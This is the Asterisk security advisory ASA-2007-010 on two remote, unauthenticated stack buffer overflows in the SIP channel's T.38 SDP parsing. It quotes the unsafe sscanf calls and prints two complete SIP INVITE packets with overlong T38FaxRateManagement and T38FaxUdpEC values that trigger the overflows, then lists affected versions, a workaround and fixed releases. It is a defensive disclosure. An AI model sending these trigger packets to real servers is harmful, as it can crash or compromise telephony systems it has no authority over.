ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code
> Asterisk Project Security Advisory - ASA-2007-010
>
> +------------------------------------------------------------------------+
> | Product | Asterisk |
> |--------------------+---------------------------------------------------|
> | Summary | Two stack buffer overflows in SIP channel's T.38 |
> | | SDP parsing code |
> |--------------------+---------------------------------------------------|
> | Nature of Advisory | Exploitable Stack Buffer Overflow |
> |--------------------+---------------------------------------------------|
> | Susceptibility | Remote Unauthenticated Sessions |
> |--------------------+---------------------------------------------------|
> | Severity | Moderate |
> |--------------------+---------------------------------------------------|
> | Exploits Known | No |
> |--------------------+---------------------------------------------------|
> | Reported On | March 22, 2007 |
> |--------------------+---------------------------------------------------|
> | Reported By | Barrie Dempster, NGS Software, |
> | | <barrie@xxxxxxxxxxxxxxx> |
> |--------------------+---------------------------------------------------|
> | Posted On | April 24, 2007 |
> |--------------------+---------------------------------------------------|
> | Last Updated On | April 24, 2007 |
> |--------------------+---------------------------------------------------|
> | Advisory Contact | kpfleming@xxxxxxxxxx |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------------------+
> |Description|Two closely related stack based buffer overflows exist in the
> SIP/SDP |
> | |handler of Asterisk, the vulnerabilities are very similar but
> exist as |
> | |two separate unsafe function calls. The T38FaxRateManagement and
> |
> | |T38FaxUdpEC SDP parameters can be exploited remotely leading to
> |
> | |arbitrary code execution without authentication. In order for
> these |
> | |overflows to occur, t38 fax over SIP must be enabled in
> sip.conf. |
> | |Examples of SIP INVITE packets are shown below, however these
> |
> | |vulnerabilities can be triggered with a number of different SIP
> messages|
> | |affecting calls received by Asterisk, or in response to calls
> made by |
> | |Asterisk.
> |
> | |
> |
> | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP
> |
> | |T38FaxRateManagement parameter
> |
> | |
> |
> | |A remote unauthenticated stack overflow exists in the SIP/SDP
> handler of|
> | |Asterisk. By sending a SIP packet with SDP data which includes
> an overly|
> | |long T38 parameter it is possible to overflow a stack based
> buffer and |
> | |execute arbitrary code.
> |
> | |
> |
> | |The process_sdp function of chan_sip.c in Asterisk contains the
> |
> | |following vulnerable call to sscanf.
> |
> | |
> |
> | |else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {
> |
> | |
> |
> | |found = 1;
> |
> | |
> |
> | |if (option_debug > 2)
> |
> | |
> |
> | |ast_log(LOG_DEBUG, "RateMangement: %s\n", s);
> |
> | |
> |
> | |if (!strcasecmp(s, "localTCF"))
> |
> | |
> |
> | |peert38capability |=
> |
> | |
> |
> | |T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
> |
> | |
> |
> | |else if (!strcasecmp(s, "transferredTCF"))
> |
> | |
> |
> | |peert38capability |=
> |
> | |
> |
> | |T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;
> |
> | |
> |
> | |This attempts to read the "T38FaxRateManagement:" option from
> the SDP |
> | |within a SIP packet and copy the succeeding string into "s".
> There are |
> | |no checks on the length of this string and we can therefore
> write past |
> | |the boundaries of the "s" variable overwriting adjacent memory
> on the |
> | |stack. "s" is defined earlier in this function as being a
> character |
> | |array of only 256 bytes. The following example packet
> demonstrates an |
> | |overflow of this parameter:
> |
> | |
> |
> | |INVITE sip:200@xxxxxxxxx SIP/2.0
> |
> | |
> |
> | |Date: Wed, 21 Mar 2007 4:20:09 GMT
> |
> | |
> |
> | |CSeq: 1 INVITE
> |
> | |
> |
> | |Via: SIP/2.0/UDP
> |
> | |
> |
> |
> |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> | |
> |
> | |User-Agent: NGS/2.0
> |
> | |
> |
> | |From: "Barrie Dempster"
> |
> | |
> |
> |
> |<sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
> | |
> |
> | |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
> |
> | |
> |
> | |To: <sip:200@localhost>
> |
> | |
> |
> | |Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>
> |
> | |
> |
> | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
> |
> | |
> |
> | |Content-Type: application/sdp
> |
> | |
> |
> | |Content-Length: 796
> |
> | |
> |
> | |Max-Forwards: 70
> |
> | |
> |
> | |v=0
> |
> | |
> |
> | |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
> |
> | |
> |
> | |s=-
> |
> | |
> |
> | |c=IN IP4 127.0.0.1
> |
> | |
> |
> | |t=0 0
> |
> | |
> |
> | |m=image 5004 UDPTL t38
> |
> | |
> |
> | |a=T38FaxVersion:0
> |
> | |
> |
> | |a=T38MaxBitRate:14400
> |
> | |
> |
> | |a=T38FaxMaxBuffer:1024
> |
> | |
> |
> | |a=T38FaxMaxDatagram:238
> |
> | |
> |
> |
> |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAA
> |
> | |
> |
> | |a=T38FaxUdpEC:t38UDPRedundancy
> |
> | |
> |
> | |-------------------------------------------------
> |
> | |
> |
> | |Remote Unauthenticated stack overflow in Asterisk SIP/SDP
> T38FaxUdpEC |
> | |parameter
> |
> | |
> |
> | |A remote unauthenticated stack overflow exists in the SIP/SDP
> handler of|
> | |Asterisk. By sending a SIP packet with SDP data which includes
> an overly|
> | |long T38FaxUdpEC parameter it is possible to overflow a stack
> based |
> | |buffer and execute arbitrary code.
> |
> | |
> |
> | |The process_sdp function of chan_sip.c in Asterisk contains the
> |
> | |following vulnerable call to sscanf.
> |
> | |
> |
> | |else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {
> |
> | |
> |
> | |found = 1;
> |
> | |
> |
> | |if (option_debug > 2)
> |
> | |
> |
> | |ast_log(LOG_DEBUG, "UDP EC: %s\n", s);
> |
> | |
> |
> | |if (!strcasecmp(s, "t38UDPRedundancy")) {
> |
> | |
> |
> | |peert38capability |=
> |
> | |
> |
> | |T38FAX_UDP_EC_REDUNDANCY;
> |
> | |
> |
> | |ast_udptl_set_error_correction_scheme(p->udptl,
> |
> | |
> |
> | |UDPTL_ERROR_CORRECTION_REDUNDANCY);
> |
> | |
> |
> | |This attempts to read the "T38FaxUdpEC:" option from the SDP
> within a |
> | |SIP packet and copy the succeeding string into "s". There are no
> checks |
> | |on the length of this string and we can therefore write past the
> |
> | |boundaries of the "s" variable overwriting adjacent memory on
> the stack.|
> | |"s" is defined earlier in this function as being a character
> array of |
> | |only 256 bytes. The following example packet demonstrates an
> overflow of|
> | |this parameter:
> |
> | |
> |
> | |INVITE sip:200@xxxxxxxxx SIP/2.0
> |
> | |
> |
> | |Date: Wed, 21 Mar 2007 4:20:09 GMT
> |
> | |
> |
> | |CSeq: 1 INVITE
> |
> | |
> |
> | |Via: SIP/2.0/UDP
> |
> | |
> |
> |
> |10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport|
> | |
> |
> | |User-Agent: NGS/2.0
> |
> | |
> |
> | |From: "Barrie Dempster"
> |
> | |
> |
> |
> |<sip:zeedo@xxxxxxxxxx:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
> | |
> |
> | |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
> |
> | |
> |
> | |To: <sip:200@localhost>
> |
> | |
> |
> | |Contact: <sip:zeedo@xxxxxxxxxx:5068;transport=udp>
> |
> | |
> |
> | |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
> |
> | |
> |
> | |Content-Type: application/sdp
> |
> | |
> |
> | |Content-Length: 796
> |
> | |
> |
> | |Max-Forwards: 70
> |
> | |
> |
> | |v=0
> |
> | |
> |
> | |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
> |
> | |
> |
> | |s=-
> |
> | |
> |
> | |c=IN IP4 127.0.0.1
> |
> | |
> |
> | |t=0 0
> |
> | |
> |
> | |m=image 5004 UDPTL t38
> |
> | |
> |
> | |a=T38FaxVersion:0
> |
> | |
> |
> | |a=T38MaxBitRate:14400
> |
> | |
> |
> | |a=T38FaxMaxBuffer:1024
> |
> | |
> |
> | |a=T38FaxMaxDatagram:238
> |
> | |
> |
> |
> |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> |
> | |
> |
> | |AAAAAAAAA
> |
> +------------------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Resolution | T.38 support in the affected versions of Asterisk is not |
> | | enabled by default, therefore the severity of this issue |
> | | is 'moderate'. |
> | | |
> | | Users who are using the default configuration with |
> | | 't38_udptl' set to 'no' or an equivalent value are not |
> | | susceptible to this vulnerability. Users who have set |
> | | this configuration item to 'yes' or an equivalent value |
> | | but are not actually using T.38 support can set it to |
> | | 'no' to secure their systems against this vulnerability. |
> | | |
> | | All other users are urged to upgrade to the appropriate |
> | | version of their Asterisk product listed in the |
> | | 'Corrected In' section below. |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Affected Versions |
> |------------------------------------------------------------------------|
> | Product | Release | |
> | | Series | |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.0.x | not affected; does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.2.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Open Source | 1.4.x | all releases prior to |
> | | | 1.4.3 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition | A.x.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | Asterisk Business Edition | B.x.x | not affected, does not |
> | | | contain T.38 support |
> |------------------------------+-------------+---------------------------|
> | AsteriskNOW | pre-release | all releases prior to and |
> | | | including Beta 5 |
> |------------------------------+-------------+---------------------------|
> | Asterisk Appliance Developer | 0.x.x | all releases prior to |
> | Kit | | 0.4.0 |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Corrected In |
> |------------------------------------------------------------------------|
> | Product | Release |
> |--------------------+---------------------------------------------------|
> | Asterisk Open | 1.4.3, available from |
> | Source | ftp://ftp.digium.com/pub/telephony/asterisk |
> |--------------------+---------------------------------------------------|
> | AsteriskNOW | Beta 6, when available from |
> | | http://www.asterisknow.org, Beta 5 users can use |
> | | use 'System Update' in the appliance control |
> | | panel to update their version of AsteriskNOW |
> |--------------------+---------------------------------------------------|
> | Asterisk Appliance | 0.4.0, available from |
> | Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Links | |
> +------------------------------------------------------------------------+
>
> +------------------------------------------------------------------------+
> | Asterisk Project Security Advisories are posted at |
> | http://www.asterisk.org/security. |
> | |
> | This document may be superseded by later versions; if so, the latest |
> | version will be posted at |
> | http://www.asterisk.org/files/ASA-2007-010.pdf. |
> +------------------------------------------------------------------------+
>
> Asterisk Project Security Advisory - ASA-2007-010
> Copyright (c) 2007 Digium, Inc. All Rights Reserved.
> Permission is hereby granted to distribute and publish this advisory in its
> original, unaltered form.